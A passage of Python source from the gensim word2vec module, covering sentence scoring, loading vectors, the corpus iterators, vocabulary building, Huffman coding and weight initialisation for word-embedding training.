If True, computes and stores loss value which can be retrieved using
:meth:`~gensim.models.word2vec.Word2Vec.get_latest_training_loss`.
callbacks : iterable of :class:`~gensim.models.callbacks.CallbackAny2Vec`, optional
Sequence of callbacks to be executed at specific stages during training.
Examples
--------
.. sourcecode:: pycon
>>> from gensim.models import Word2Vec
>>> sentences = [["cat", "say", "meow"], ["dog", "say", "woof"]]
>>>
>>> model = Word2Vec(min_count=1)
>>> model.build_vocab(sentences) # prepare the model vocabulary
>>> model.train(sentences, total_examples=model.corpus_count, epochs=model.iter) # train word vectors
(1, 30)
"""
return super(Word2Vec, self).train(
sentences=sentences, corpus_file=corpus_file, total_examples=total_examples, total_words=total_words,
epochs=epochs, start_alpha=start_alpha, end_alpha=end_alpha, word_count=word_count,
queue_factor=queue_factor, report_delay=report_delay, compute_loss=compute_loss, callbacks=callbacks)
def score(self, sentences, total_sentences=int(1e6), chunksize=100, queue_factor=2, report_delay=1):
"""Score the log probability for a sequence of sentences.
This does not change the fitted model in any way (see :meth:`~gensim.models.word2vec.Word2Vec.train` for that).
Gensim has currently only implemented score for the hierarchical softmax scheme,
so you need to have run word2vec with `hs=1` and `negative=0` for this to work.
Note that you should specify `total_sentences`; you'll run into problems if you ask to
score more than this number of sentences but it is inefficient to set the value too high.
See the `article by Matt Taddy: "Document Classification by Inversion of Distributed Language Representations"
<https://arxiv.org/pdf/1504.07295.pdf>`_ and the
`gensim demo <https://github.com/piskvorky/gensim/blob/develop/docs/notebooks/deepir.ipynb>`_ for examples of
how to use such scores in document classification.
Parameters
----------
sentences : iterable of list of str
The `sentences` iterable can be simply a list of lists of tokens, but for larger corpora,
consider an iterable that streams the sentences directly from disk/network.
See :class:`~gensim.models.word2vec.BrownCorpus`, :class:`~gensim.models.word2vec.Text8Corpus`
or :class:`~gensim.models.word2vec.LineSentence` in :mod:`~gensim.models.word2vec` module for such examples.
total_sentences : int, optional
Count of sentences.
chunksize : int, optional
Chunksize of jobs
queue_factor : int, optional
Multiplier for size of queue (number of workers * queue_factor).
report_delay : float, optional
Seconds to wait before reporting progress.
"""
if FAST_VERSION < 0:
warnings.warn(
"C extension compilation failed, scoring will be slow. "
"Install a C compiler and reinstall gensim for fastness."
)
logger.info(
"scoring sentences with %i workers on %i vocabulary and %i features, "
"using sg=%s hs=%s sample=%s and negative=%s",
self.workers, len(self.wv.vocab), self.trainables.layer1_size, self.sg, self.hs,
self.vocabulary.sample, self.negative
)
if not self.wv.vocab:
raise RuntimeError("you must first build vocabulary before scoring new data")
if not self.hs:
raise RuntimeError(
"We have currently only implemented score for the hierarchical softmax scheme, "
"so you need to have run word2vec with hs=1 and negative=0 for this to work."
)
def worker_loop():
"""Compute log probability for each sentence, lifting lists of sentences from the jobs queue."""
work = zeros(1, dtype=REAL) # for sg hs, we actually only need one memory loc (running sum)
neu1 = matutils.zeros_aligned(self.trainables.layer1_size, dtype=REAL)
while True:
job = job_queue.get()
if job is None: # signal to finish
break
ns = 0
for sentence_id, sentence in job:
if sentence_id >= total_sentences:
break
if self.sg:
score = score_sentence_sg(self, sentence, work)
else:
score = score_sentence_cbow(self, sentence, work, neu1)
sentence_scores[sentence_id] = score
ns += 1
progress_queue.put(ns) # report progress
start, next_report = default_timer(), 1.0
# buffer ahead only a limited number of jobs.. this is the reason we can't simply use ThreadPool :(
job_queue = Queue(maxsize=queue_factor * self.workers)
progress_queue = Queue(maxsize=(queue_factor + 1) * self.workers)
workers = [threading.Thread(target=worker_loop) for _ in range(self.workers)]
for thread in workers:
thread.daemon = True # make interrupting the process with ctrl+c easier
thread.start()
sentence_count = 0
sentence_scores = matutils.zeros_aligned(total_sentences, dtype=REAL)
push_done = False
done_jobs = 0
jobs_source = enumerate(utils.grouper(enumerate(sentences), chunksize))
# fill jobs queue with (id, sentence) job items
while True:
try:
job_no, items = next(jobs_source)
if (job_no - 1) * chunksize > total_sentences:
logger.warning(
"terminating after %i sentences (set higher total_sentences if you want more).",
total_sentences
)
job_no -= 1
raise StopIteration()
logger.debug("putting job #%i in the queue", job_no)
job_queue.put(items)
except StopIteration:
logger.info("reached end of input; waiting to finish %i outstanding jobs", job_no - done_jobs + 1)
for _ in range(self.workers):
job_queue.put(None) # give the workers heads up that they can finish -- no more work!
push_done = True
try:
while done_jobs < (job_no + 1) or not push_done:
ns = progress_queue.get(push_done) # only block after all jobs pushed
sentence_count += ns
done_jobs += 1
elapsed = default_timer() - start
if elapsed >= next_report:
logger.info(
"PROGRESS: at %.2f%% sentences, %.0f sentences/s",
100.0 * sentence_count, sentence_count / elapsed
)
next_report = elapsed + report_delay # don't flood log, wait report_delay seconds
else:
# loop ended by job count; really done
break
except Empty:
pass # already out of loop; continue to next push
elapsed = default_timer() - start
self.clear_sims()
logger.info(
"scoring %i sentences took %.1fs, %.0f sentences/s",
sentence_count, elapsed, sentence_count / elapsed
)
return sentence_scores[:sentence_count]
def clear_sims(self):
"""Remove all L2-normalized word vectors from the model, to free up memory.
You can recompute them later again using the :meth:`~gensim.models.word2vec.Word2Vec.init_sims` method.
"""
self.wv.vectors_norm = None
def intersect_word2vec_format(self, fname, lockf=0.0, binary=False, encoding='utf8', unicode_errors='strict'):
"""Merge in an input-hidden weight matrix loaded from the original C word2vec-tool format,
where it intersects with the current vocabulary.
No words are added to the existing vocabulary, but intersecting words adopt the file's weights, and
non-intersecting words are left alone.
Parameters
----------
fname : str
The file path to load the vectors from.
lockf : float, optional
Lock-factor value to be set for any imported word-vectors; the
default value of 0.0 prevents further updating of the vector during subsequent
training. Use 1.0 to allow further training updates of merged vectors.
binary : bool, optional
If True, `fname` is in the binary word2vec C format.
encoding : str, optional
Encoding of `text` for `unicode` function (python2 only).
unicode_errors : str, optional
Error handling behaviour, used as parameter for `unicode` function (python2 only).
"""
overlap_count = 0
logger.info("loading projection weights from %s", fname)
with utils.smart_open(fname) as fin:
header = utils.to_unicode(fin.readline(), encoding=encoding)
vocab_size, vector_size = (int(x) for x in header.split()) # throws for invalid file format
if not vector_size == self.wv.vector_size:
raise ValueError("incompatible vector size %d in file %s" % (vector_size, fname))
# TOCONSIDER: maybe mismatched vectors still useful enough to merge (truncating/padding)?
if binary:
binary_len = dtype(REAL).itemsize * vector_size
for _ in range(vocab_size):
# mixed text and binary: read text first, then binary
word = []
while True:
ch = fin.read(1)
if ch == b' ':
break
if ch != b'\n': # ignore newlines in front of words (some binary files have)
word.append(ch)
word = utils.to_unicode(b''.join(word), encoding=encoding, errors=unicode_errors)
weights = fromstring(fin.read(binary_len), dtype=REAL)
if word in self.wv.vocab:
overlap_count += 1
self.wv.vectors[self.wv.vocab[word].index] = weights
self.trainables.vectors_lockf[self.wv.vocab[word].index] = lockf # lock-factor: 0.0=no changes
else:
for line_no, line in enumerate(fin):
parts = utils.to_unicode(line.rstrip(), encoding=encoding, errors=unicode_errors).split(" ")
if len(parts) != vector_size + 1:
raise ValueError("invalid vector on line %s (is this really the text format?)" % line_no)
word, weights = parts[0], [REAL(x) for x in parts[1:]]
if word in self.wv.vocab:
overlap_count += 1
self.wv.vectors[self.wv.vocab[word].index] = weights
self.trainables.vectors_lockf[self.wv.vocab[word].index] = lockf # lock-factor: 0.0=no changes
logger.info("merged %d vectors into %s matrix from %s", overlap_count, self.wv.vectors.shape, fname)
@deprecated("Method will be removed in 4.0.0, use self.wv.__getitem__() instead")
def __getitem__(self, words):
"""Deprecated. Use `self.wv.__getitem__` instead.
Refer to the documentation for :meth:`~gensim.models.keyedvectors.Word2VecKeyedVectors.__getitem__`.
"""
return self.wv.__getitem__(words)
@deprecated("Method will be removed in 4.0.0, use self.wv.__contains__() instead")
def __contains__(self, word):
"""Deprecated. Use `self.wv.__contains__` instead.
Refer to the documentation for :meth:`~gensim.models.keyedvectors.Word2VecKeyedVectors.__contains__`.
"""
return self.wv.__contains__(word)
def predict_output_word(self, context_words_list, topn=10):
"""Get the probability distribution of the center word given context words.
Parameters
----------
context_words_list : list of str
List of context words.
topn : int, optional
Return `topn` words and their probabilities.
Returns
-------
list of (str, float)
`topn` length list of tuples of (word, probability).
"""
if not self.negative:
raise RuntimeError(
"We have currently only implemented predict_output_word for the negative sampling scheme, "
"so you need to have run word2vec with negative > 0 for this to work."
)
if not hasattr(self.wv, 'vectors') or not hasattr(self.trainables, 'syn1neg'):
raise RuntimeError("Parameters required for predicting the output words not found.")
word_vocabs = [self.wv.vocab[w] for w in context_words_list if w in self.wv.vocab]
if not word_vocabs:
warnings.warn("All the input context words are out-of-vocabulary for the current model.")
return None
word2_indices = [word.index for word in word_vocabs]
l1 = np_sum(self.wv.vectors[word2_indices], axis=0)
if word2_indices and self.cbow_mean:
l1 /= len(word2_indices)
# propagate hidden -> output and take softmax to get probabilities
prob_values = exp(dot(l1, self.trainables.syn1neg.T))
prob_values /= sum(prob_values)
top_indices = matutils.argsort(prob_values, topn=topn, reverse=True)
# returning the most probable output words with their probabilities
return [(self.wv.index2word[index1], prob_values[index1]) for index1 in top_indices]
def init_sims(self, replace=False):
"""Deprecated. Use `self.wv.init_sims` instead.
See :meth:`~gensim.models.keyedvectors.Word2VecKeyedVectors.init_sims`.
"""
if replace and hasattr(self.trainables, 'syn1'):
del self.trainables.syn1
return self.wv.init_sims(replace)
def reset_from(self, other_model):
"""Borrow shareable pre-built structures from `other_model` and reset hidden layer weights.
Structures copied are:
* Vocabulary
* Index to word mapping
* Cumulative frequency table (used for negative sampling)
* Cached corpus length
Useful when testing multiple models on the same corpus in parallel.
Parameters
----------
other_model : :class:`~gensim.models.word2vec.Word2Vec`
Another model to copy the internal structures from.
"""
self.wv.vocab = other_model.wv.vocab
self.wv.index2word = other_model.wv.index2word
self.vocabulary.cum_table = other_model.vocabulary.cum_table
self.corpus_count = other_model.corpus_count
self.trainables.reset_weights(self.hs, self.negative, self.wv)
@staticmethod
def log_accuracy(section):
"""Deprecated. Use `self.wv.log_accuracy` instead.
See :meth:`~gensim.models.word2vec.Word2VecKeyedVectors.log_accuracy`.
"""
return Word2VecKeyedVectors.log_accuracy(section)
@deprecated("Method will be removed in 4.0.0, use self.wv.evaluate_word_analogies() instead")
def accuracy(self, questions, restrict_vocab=30000, most_similar=None, case_insensitive=True):
"""Deprecated. Use `self.wv.accuracy` instead.
See :meth:`~gensim.models.word2vec.Word2VecKeyedVectors.accuracy`.
"""
most_similar = most_similar or Word2VecKeyedVectors.most_similar
return self.wv.accuracy(questions, restrict_vocab, most_similar, case_insensitive)
def __str__(self):
"""Human readable representation of the model's state.
Returns
-------
str
Human readable representation of the model's state, including the vocabulary size, vector size
and learning rate.
"""
return "%s(vocab=%s, size=%s, alpha=%s)" % (
self.__class__.__name__, len(self.wv.index2word), self.wv.vector_size, self.alpha
)
def delete_temporary_training_data(self, replace_word_vectors_with_normalized=False):
"""Discard parameters that are used in training and scoring, to save memory.
Warnings
--------
Use only if you're sure you're done training a model.
Parameters
----------
replace_word_vectors_with_normalized : bool, optional
If True, forget the original (not normalized) word vectors and only keep
the L2-normalized word vectors, to save even more memory.
"""
if replace_word_vectors_with_normalized:
self.init_sims(replace=True)
self._minimize_model()
def save(self, *args, **kwargs):
"""Save the model.
This saved model can be loaded again using :func:`~gensim.models.word2vec.Word2Vec.load`, which supports
online training and getting vectors for vocabulary words.
Parameters
----------
fname : str
Path to the file.
"""
# don't bother storing the cached normalized vectors, recalculable table
kwargs['ignore'] = kwargs.get('ignore', ['vectors_norm', 'cum_table'])
super(Word2Vec, self).save(*args, **kwargs)
def get_latest_training_loss(self):
"""Get current value of the training loss.
Returns
-------
float
Current training loss.
"""
return self.running_training_loss
@deprecated(
"Method will be removed in 4.0.0, keep just_word_vectors = model.wv to retain just the KeyedVectors instance"
)
def _minimize_model(self, save_syn1=False, save_syn1neg=False, save_vectors_lockf=False):
if save_syn1 and save_syn1neg and save_vectors_lockf:
return
if hasattr(self.trainables, 'syn1') and not save_syn1:
del self.trainables.syn1
if hasattr(self.trainables, 'syn1neg') and not save_syn1neg:
del self.trainables.syn1neg
if hasattr(self.trainables, 'vectors_lockf') and not save_vectors_lockf:
del self.trainables.vectors_lockf
self.model_trimmed_post_training = True
@classmethod
def load_word2vec_format(
cls, fname, fvocab=None, binary=False, encoding='utf8', unicode_errors='strict',
limit=None, datatype=REAL):
"""Deprecated. Use :meth:`gensim.models.KeyedVectors.load_word2vec_format` instead."""
raise DeprecationWarning("Deprecated. Use gensim.models.KeyedVectors.load_word2vec_format instead.")
def save_word2vec_format(self, fname, fvocab=None, binary=False):
"""Deprecated. Use `model.wv.save_word2vec_format` instead.
See :meth:`gensim.models.KeyedVectors.save_word2vec_format`.
"""
raise DeprecationWarning("Deprecated. Use model.wv.save_word2vec_format instead.")
@classmethod
def load(cls, *args, **kwargs):
"""Load a previously saved :class:`~gensim.models.word2vec.Word2Vec` model.
See Also
--------
:meth:`~gensim.models.word2vec.Word2Vec.save`
Save model.
Parameters
----------
fname : str
Path to the saved file.
Returns
-------
:class:`~gensim.models.word2vec.Word2Vec`
Loaded model.
"""
try:
model = super(Word2Vec, cls).load(*args, **kwargs)
# for backward compatibility for `max_final_vocab` feature
if not hasattr(model, 'max_final_vocab'):
model.max_final_vocab = None
model.vocabulary.max_final_vocab = None
return model
except AttributeError:
logger.info('Model saved using code from earlier Gensim Version. Re-loading old model in a compatible way.')
from gensim.models.deprecated.word2vec import load_old_word2vec
return load_old_word2vec(*args, **kwargs)
class BrownCorpus(object):
"""Iterate over sentences from the `Brown corpus <https://en.wikipedia.org/wiki/Brown_Corpus>`_
(part of `NLTK data <https://www.nltk.org/data.html>`_).
"""
def __init__(self, dirname):
self.dirname = dirname
def __iter__(self):
for fname in os.listdir(self.dirname):
fname = os.path.join(self.dirname, fname)
if not os.path.isfile(fname):
continue
for line in utils.smart_open(fname):
line = utils.to_unicode(line)
# each file line is a single sentence in the Brown corpus
# each token is WORD/POS_TAG
token_tags = [t.split('/') for t in line.split() if len(t.split('/')) == 2]
# ignore words with non-alphabetic tags like ",", "!" etc (punctuation, weird stuff)
words = ["%s/%s" % (token.lower(), tag[:2]) for token, tag in token_tags if tag[:2].isalpha()]
if not words: # don't bother sending out empty sentences
continue
yield words
class Text8Corpus(object):
"""Iterate over sentences from the "text8" corpus, unzipped from http://mattmahoney.net/dc/text8.zip."""
def __init__(self, fname, max_sentence_length=MAX_WORDS_IN_BATCH):
self.fname = fname
self.max_sentence_length = max_sentence_length
def __iter__(self):
# the entire corpus is one gigantic line -- there are no sentence marks at all
# so just split the sequence of tokens arbitrarily: 1 sentence = 1000 tokens
sentence, rest = [], b''
with utils.smart_open(self.fname) as fin:
while True:
text = rest + fin.read(8192) # avoid loading the entire file (=1 line) into RAM
if text == rest: # EOF
words = utils.to_unicode(text).split()
sentence.extend(words) # return the last chunk of words, too (may be shorter/longer)
if sentence:
yield sentence
break
last_token = text.rfind(b' ') # last token may have been split in two... keep for next iteration
words, rest = (utils.to_unicode(text[:last_token]).split(),
text[last_token:].strip()) if last_token >= 0 else ([], text)
sentence.extend(words)
while len(sentence) >= self.max_sentence_length:
yield sentence[:self.max_sentence_length]
sentence = sentence[self.max_sentence_length:]
class LineSentence(object):
"""Iterate over a file that contains sentences: one line = one sentence.
Words must be already preprocessed and separated by whitespace.
"""
def __init__(self, source, max_sentence_length=MAX_WORDS_IN_BATCH, limit=None):
"""
Parameters
----------
source : string or a file-like object
Path to the file on disk, or an already-open file object (must support `seek(0)`).
limit : int or None
Clip the file to the first `limit` lines. Do no clipping if `limit is None` (the default).
Examples
--------
.. sourcecode:: pycon
>>> from gensim.test.utils import datapath
>>> sentences = LineSentence(datapath('lee_background.cor'))
>>> for sentence in sentences:
... pass
"""
self.source = source
self.max_sentence_length = max_sentence_length
self.limit = limit
def __iter__(self):
"""Iterate through the lines in the source."""
try:
# Assume it is a file-like object and try treating it as such
# Things that don't have seek will trigger an exception
self.source.seek(0)
for line in itertools.islice(self.source, self.limit):
line = utils.to_unicode(line).split()
i = 0
while i < len(line):
yield line[i: i + self.max_sentence_length]
i += self.max_sentence_length
except AttributeError:
# If it didn't work like a file, use it as a string filename
with utils.smart_open(self.source) as fin:
for line in itertools.islice(fin, self.limit):
line = utils.to_unicode(line).split()
i = 0
while i < len(line):
yield line[i: i + self.max_sentence_length]
i += self.max_sentence_length
class PathLineSentences(object):
"""Like :class:`~gensim.models.word2vec.LineSentence`, but process all files in a directory
in alphabetical order by filename.
The directory must only contain files that can be read by :class:`gensim.models.word2vec.LineSentence`:
.bz2, .gz, and text files. Any file not ending with .bz2 or .gz is assumed to be a text file.
The format of files (either text, or compressed text files) in the path is one sentence = one line,
with words already preprocessed and separated by whitespace.
Warnings
--------
Does **not recurse** into subdirectories.
"""
def __init__(self, source, max_sentence_length=MAX_WORDS_IN_BATCH, limit=None):
"""
Parameters
----------
source : str
Path to the directory.
limit : int or None
Read only the first `limit` lines from each file. Read all if limit is None (the default).
"""
self.source = source
self.max_sentence_length = max_sentence_length
self.limit = limit
if os.path.isfile(self.source):
logger.debug('single file given as source, rather than a directory of files')
logger.debug('consider using models.word2vec.LineSentence for a single file')
self.input_files = [self.source] # force code compatibility with list of files
elif os.path.isdir(self.source):
self.source = os.path.join(self.source, '') # ensures os-specific slash at end of path
logger.info('reading directory %s', self.source)
self.input_files = os.listdir(self.source)
self.input_files = [self.source + filename for filename in self.input_files] # make full paths
self.input_files.sort() # makes sure it happens in filename order
else: # not a file or a directory, then we can't do anything with it
raise ValueError('input is neither a file nor a path')
logger.info('files read into PathLineSentences:%s', '\n'.join(self.input_files))
def __iter__(self):
"""iterate through the files"""
for file_name in self.input_files:
logger.info('reading file %s', file_name)
with utils.smart_open(file_name) as fin:
for line in itertools.islice(fin, self.limit):
line = utils.to_unicode(line).split()
i = 0
while i < len(line):
yield line[i:i + self.max_sentence_length]
i += self.max_sentence_length
def _scan_vocab_worker(stream, progress_queue, max_vocab_size=None, trim_rule=None):
"""Do an initial scan of all words appearing in stream.
Note: This function can not be Word2VecVocab's method because
of multiprocessing synchronization specifics in Python.
"""
min_reduce = 1
vocab = defaultdict(int)
checked_string_types = 0
sentence_no = -1
total_words = 0
for sentence_no, sentence in enumerate(stream):
if not checked_string_types:
if isinstance(sentence, string_types):
log_msg = "Each 'sentences' item should be a list of words (usually unicode strings). " \
"First item here is instead plain %s." % type(sentence)
progress_queue.put(log_msg)
checked_string_types += 1
for word in sentence:
vocab[word] += 1
if max_vocab_size and len(vocab) > max_vocab_size:
utils.prune_vocab(vocab, min_reduce, trim_rule=trim_rule)
min_reduce += 1
total_words += len(sentence)
progress_queue.put((total_words, sentence_no + 1))
progress_queue.put(None)
return vocab
class Word2VecVocab(utils.SaveLoad):
"""Vocabulary used by :class:`~gensim.models.word2vec.Word2Vec`."""
def __init__(
self, max_vocab_size=None, min_count=5, sample=1e-3, sorted_vocab=True, null_word=0,
max_final_vocab=None, ns_exponent=0.75):
self.max_vocab_size = max_vocab_size
self.min_count = min_count
self.sample = sample
self.sorted_vocab = sorted_vocab
self.null_word = null_word
self.cum_table = None # for negative sampling
self.raw_vocab = None
self.max_final_vocab = max_final_vocab
self.ns_exponent = ns_exponent
def _scan_vocab(self, sentences, progress_per, trim_rule):
sentence_no = -1
total_words = 0
min_reduce = 1
vocab = defaultdict(int)
checked_string_types = 0
for sentence_no, sentence in enumerate(sentences):
if not checked_string_types:
if isinstance(sentence, string_types):
logger.warning(
"Each 'sentences' item should be a list of words (usually unicode strings). "
"First item here is instead plain %s.",
type(sentence)
)
checked_string_types += 1
if sentence_no % progress_per == 0:
logger.info(
"PROGRESS: at sentence #%i, processed %i words, keeping %i word types",
sentence_no, total_words, len(vocab)
)
for word in sentence:
vocab[word] += 1
total_words += len(sentence)
if self.max_vocab_size and len(vocab) > self.max_vocab_size:
utils.prune_vocab(vocab, min_reduce, trim_rule=trim_rule)
min_reduce += 1
corpus_count = sentence_no + 1
self.raw_vocab = vocab
return total_words, corpus_count
def scan_vocab(self, sentences=None, corpus_file=None, progress_per=10000, workers=None, trim_rule=None):
logger.info("collecting all words and their counts")
if corpus_file:
sentences = LineSentence(corpus_file)
total_words, corpus_count = self._scan_vocab(sentences, progress_per, trim_rule)
logger.info(
"collected %i word types from a corpus of %i raw words and %i sentences",
len(self.raw_vocab), total_words, corpus_count
)
return total_words, corpus_count
def sort_vocab(self, wv):
"""Sort the vocabulary so the most frequent words have the lowest indexes."""
if len(wv.vectors):
raise RuntimeError("cannot sort vocabulary after model weights already initialized.")
wv.index2word.sort(key=lambda word: wv.vocab[word].count, reverse=True)
for i, word in enumerate(wv.index2word):
wv.vocab[word].index = i
def prepare_vocab(
self, hs, negative, wv, update=False, keep_raw_vocab=False, trim_rule=None,
min_count=None, sample=None, dry_run=False):
"""Apply vocabulary settings for `min_count` (discarding less-frequent words)
and `sample` (controlling the downsampling of more-frequent words).
Calling with `dry_run=True` will only simulate the provided settings and
report the size of the retained vocabulary, effective corpus length, and
estimated memory requirements. Results are both printed via logging and
returned as a dict.
Delete the raw vocabulary after the scaling is done to free up RAM,
unless `keep_raw_vocab` is set.
"""
min_count = min_count or self.min_count
sample = sample or self.sample
drop_total = drop_unique = 0
# set effective_min_count to min_count in case max_final_vocab isn't set
self.effective_min_count = min_count
# if max_final_vocab is specified instead of min_count
# pick a min_count which satisfies max_final_vocab as well as possible
if self.max_final_vocab is not None:
sorted_vocab = sorted(self.raw_vocab.keys(), key=lambda word: self.raw_vocab[word], reverse=True)
calc_min_count = 1
if self.max_final_vocab < len(sorted_vocab):
calc_min_count = self.raw_vocab[sorted_vocab[self.max_final_vocab]] + 1
self.effective_min_count = max(calc_min_count, min_count)
logger.info(
"max_final_vocab=%d and min_count=%d resulted in calc_min_count=%d, effective_min_count=%d",
self.max_final_vocab, min_count, calc_min_count, self.effective_min_count
)
if not update:
logger.info("Loading a fresh vocabulary")
retain_total, retain_words = 0, []
# Discard words less-frequent than min_count
if not dry_run:
wv.index2word = []
# make stored settings match these applied settings
self.min_count = min_count
self.sample = sample
wv.vocab = {}
for word, v in iteritems(self.raw_vocab):
if keep_vocab_item(word, v, self.effective_min_count, trim_rule=trim_rule):
retain_words.append(word)
retain_total += v
if not dry_run:
wv.vocab[word] = Vocab(count=v, index=len(wv.index2word))
wv.index2word.append(word)
else:
drop_unique += 1
drop_total += v
original_unique_total = len(retain_words) + drop_unique
retain_unique_pct = len(retain_words) * 100 / max(original_unique_total, 1)
logger.info(
"effective_min_count=%d retains %i unique words (%i%% of original %i, drops %i)",
self.effective_min_count, len(retain_words), retain_unique_pct, original_unique_total, drop_unique
)
original_total = retain_total + drop_total
retain_pct = retain_total * 100 / max(original_total, 1)
logger.info(
"effective_min_count=%d leaves %i word corpus (%i%% of original %i, drops %i)",
self.effective_min_count, retain_total, retain_pct, original_total, drop_total
)
else:
logger.info("Updating model with new vocabulary")
new_total = pre_exist_total = 0
new_words = pre_exist_words = []
for word, v in iteritems(self.raw_vocab):
if keep_vocab_item(word, v, self.effective_min_count, trim_rule=trim_rule):
if word in wv.vocab:
pre_exist_words.append(word)
pre_exist_total += v
if not dry_run:
wv.vocab[word].count += v
else:
new_words.append(word)
new_total += v
if not dry_run:
wv.vocab[word] = Vocab(count=v, index=len(wv.index2word))
wv.index2word.append(word)
else:
drop_unique += 1
drop_total += v
original_unique_total = len(pre_exist_words) + len(new_words) + drop_unique
pre_exist_unique_pct = len(pre_exist_words) * 100 / max(original_unique_total, 1)
new_unique_pct = len(new_words) * 100 / max(original_unique_total, 1)
logger.info(
"New added %i unique words (%i%% of original %i) "
"and increased the count of %i pre-existing words (%i%% of original %i)",
len(new_words), new_unique_pct, original_unique_total, len(pre_exist_words),
pre_exist_unique_pct, original_unique_total
)
retain_words = new_words + pre_exist_words
retain_total = new_total + pre_exist_total
# Precalculate each vocabulary item's threshold for sampling
if not sample:
# no words downsampled
threshold_count = retain_total
elif sample < 1.0:
# traditional meaning: set parameter as proportion of total
threshold_count = sample * retain_total
else:
# new shorthand: sample >= 1 means downsample all words with higher count than sample
threshold_count = int(sample * (3 + sqrt(5)) / 2)
downsample_total, downsample_unique = 0, 0
for w in retain_words:
v = self.raw_vocab[w]
word_probability = (sqrt(v / threshold_count) + 1) * (threshold_count / v)
if word_probability < 1.0:
downsample_unique += 1
downsample_total += word_probability * v
else:
word_probability = 1.0
downsample_total += v
if not dry_run:
wv.vocab[w].sample_int = int(round(word_probability * 2**32))
if not dry_run and not keep_raw_vocab:
logger.info("deleting the raw counts dictionary of %i items", len(self.raw_vocab))
self.raw_vocab = defaultdict(int)
logger.info("sample=%g downsamples %i most-common words", sample, downsample_unique)
logger.info(
"downsampling leaves estimated %i word corpus (%.1f%% of prior %i)",
downsample_total, downsample_total * 100.0 / max(retain_total, 1), retain_total
)
# return from each step: words-affected, resulting-corpus-size, extra memory estimates
report_values = {
'drop_unique': drop_unique, 'retain_total': retain_total, 'downsample_unique': downsample_unique,
'downsample_total': int(downsample_total), 'num_retained_words': len(retain_words)
}
if self.null_word:
# create null pseudo-word for padding when using concatenative L1 (run-of-words)
# this word is only ever input – never predicted – so count, huffman-point, etc doesn't matter
self.add_null_word(wv)
if self.sorted_vocab and not update:
self.sort_vocab(wv)
if hs:
# add info about each word's Huffman encoding
self.create_binary_tree(wv)
if negative:
# build the table for drawing random words (for negative sampling)
self.make_cum_table(wv)
return report_values
def add_null_word(self, wv):
word, v = '\0', Vocab(count=1, sample_int=0)
v.index = len(wv.vocab)
wv.index2word.append(word)
wv.vocab[word] = v
def create_binary_tree(self, wv):
"""Create a `binary Huffman tree <https://en.wikipedia.org/wiki/Huffman_coding>`_ using stored vocabulary
word counts. Frequent words will have shorter binary codes.
Called internally from :meth:`~gensim.models.word2vec.Word2VecVocab.build_vocab`.
"""
_assign_binary_codes(wv.vocab)
def make_cum_table(self, wv, domain=2**31 - 1):
"""Create a cumulative-distribution table using stored vocabulary word counts for
drawing random words in the negative-sampling training routines.
To draw a word index, choose a random integer up to the maximum value in the table (cum_table[-1]),
then finding that integer's sorted insertion point (as if by `bisect_left` or `ndarray.searchsorted()`).
That insertion point is the drawn index, coming up in proportion equal to the increment at that slot.
Called internally from :meth:`~gensim.models.word2vec.Word2VecVocab.build_vocab`.
"""
vocab_size = len(wv.index2word)
self.cum_table = zeros(vocab_size, dtype=uint32)
# compute sum of all power (Z in paper)
train_words_pow = 0.0
for word_index in range(vocab_size):
train_words_pow += wv.vocab[wv.index2word[word_index]].count**self.ns_exponent
cumulative = 0.0
for word_index in range(vocab_size):
cumulative += wv.vocab[wv.index2word[word_index]].count**self.ns_exponent
self.cum_table[word_index] = round(cumulative / train_words_pow * domain)
if len(self.cum_table) > 0:
assert self.cum_table[-1] == domain
def _build_heap(vocab):
heap = list(itervalues(vocab))
heapq.heapify(heap)
for i in range(len(vocab) - 1):
min1, min2 = heapq.heappop(heap), heapq.heappop(heap)
heapq.heappush(
heap, Vocab(count=min1.count + min2.count, index=i + len(vocab), left=min1, right=min2)
)
return heap
def _assign_binary_codes(vocab):
"""
Appends a binary code to each vocab term.
Parameters
----------
vocab : dict
A dictionary of :class:`gensim.models.word2vec.Vocab` objects.
Notes
-----
Expects each term to have an .index attribute that contains the order in
which the term was added to the vocabulary. E.g. term.index == 0 means the
term was added to the vocab first.
Sets the .code and .point attributes of each node.
Each code is a numpy.array containing 0s and 1s.
Each point is an integer.
"""
logger.info("constructing a huffman tree from %i words", len(vocab))
heap = _build_heap(vocab)
if not heap:
#
# TODO: how can we end up with an empty heap?
#
logger.info("built huffman tree with maximum node depth 0")
return
# recurse over the tree, assigning a binary code to each vocabulary word
max_depth = 0
stack = [(heap[0], [], [])]
while stack:
node, codes, points = stack.pop()
if node.index < len(vocab):
# leaf node => store its path from the root
node.code, node.point = codes, points
max_depth = max(len(codes), max_depth)
else:
# inner node => continue recursion
points = array(list(points) + [node.index - len(vocab)], dtype=uint32)
stack.append((node.left, array(list(codes) + [0], dtype=uint8), points))
stack.append((node.right, array(list(codes) + [1], dtype=uint8), points))
logger.info("built huffman tree with maximum node depth %i", max_depth)
class Word2VecTrainables(utils.SaveLoad):
"""Represents the inner shallow neural network used to train :class:`~gensim.models.word2vec.Word2Vec`."""
def __init__(self, vector_size=100, seed=1, hashfxn=hash):
self.hashfxn = hashfxn
self.layer1_size = vector_size
self.seed = seed
def prepare_weights(self, hs, negative, wv, update=False, vocabulary=None):
"""Build tables and model weights based on final vocabulary settings."""
# set initial input/projection and hidden weights
if not update:
self.reset_weights(hs, negative, wv)
else:
self.update_weights(hs, negative, wv)
def seeded_vector(self, seed_string, vector_size):
"""Get a random vector (but deterministic by seed_string)."""
# Note: built-in hash() may vary by Python version or even (in Py3.x) per launch
once = random.RandomState(self.hashfxn(seed_string) & 0xffffffff)
return (once.rand(vector_size) - 0.5) / vector_size
def reset_weights(self, hs, negative, wv):
"""Reset all projection weights to an initial (untrained) state, but keep the existing vocabulary."""
logger.info("resetting layer weights")
wv.vectors = empty((len(wv.vocab), wv.vector_size), dtype=REAL)
# randomize weights vector by vector, rather than materializing a huge random matrix in RAM at once
for i in range(len(wv.vocab)):
# construct deterministic seed from word AND seed argument
wv.vectors[i] = self.seeded_vector(wv.index2word[i] + str(self.seed), wv.vector_size)
if hs:
self.syn1 = zeros((len(wv.vocab), self.layer1_size), dtype=REAL)
if negative:
self.syn1neg = zeros((len(wv.vocab), self.layer1_size), dtype=REAL)
wv.vectors_norm = None
self.vectors_lockf = ones(len(wv.vocab), dtype=REAL) # zeros suppress learning
def update_weights(self, hs, negative, wv):
"""Copy all the existing weights, and reset the weights for the newly added vocabulary."""
logger.info("updating layer weights")
gained_vocab = len(wv.vocab) - len(wv.vectors)
newvectors = empty((gained_vocab, wv.vector_size), dtype=REAL)
# randomize the remaining words
for i in range(len(wv.vectors), len(wv.vocab)):
